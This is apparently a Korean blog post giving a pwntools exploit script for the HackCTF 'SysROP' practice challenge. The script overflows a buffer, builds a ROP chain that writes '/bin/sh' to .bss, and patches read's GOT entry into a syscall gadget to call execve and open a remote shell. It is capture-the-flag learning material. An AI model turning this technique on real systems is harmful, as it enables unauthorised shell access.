HackCTF - SysROP

시스템 해킹/HackCTF

HackCTF - SysROP

ii4gsp 2020. 5. 5. 23:05

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3024)
e = ELF('./sysrop')
libc = ELF('./libc.so.6')

payload = ''
payload += '\x90' * (0x10 + 0x8)
payload += p64(0x00000000004005eb)
payload += p64(8)
payload += p64(0)
payload += p64(e.bss() + 0x100)
payload += p64(e.plt['read'])
payload += p64(0x4005f2)

r.sendline(payload)
sleep(0.1)
r.send('/bin/sh\x00')
sleep(0.1)

payload = ''
payload += '\x90' * (0x10 + 0x8)
payload += p64(0x00000000004005eb)
payload += p64(1)
payload += p64(0)
payload += p64(e.got['read'])
payload += p64(e.plt['read'])
payload += p64(0x00000000004005ea)
payload += p64(59)
payload += p64(0x0)
payload += p64(e.bss() + 0x100)
payload += p64(0x0)
payload += p64(e.plt['read'])

r.sendline(payload)
sleep(0.1)
r.send('\x5e')
sleep(0.1)

r.interactive()

Exploit